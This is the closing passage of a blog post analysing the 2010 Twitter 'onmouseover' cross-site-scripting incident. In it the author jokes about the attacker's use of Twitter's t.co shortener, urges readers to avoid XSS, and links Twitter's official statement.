Finally, some mockery. Instead of using any insignificant URL, the attacker used t.co, which is twitter’s own controversially discussed URL shortening service they introduced claiming it would enhance security for twitter users, really stylish, isn’t it? 😀

Hope you’ve enjoyed reading how it’s done, and avoid Cross-Site-Scripting ppl! 🙂

[Update: Twitter put out an official statement about the issue which is, of course, a lot less technical than my analysis 😉 : http://blog.twitter.com/2010/09/all-about-onmouseover-incident.html ]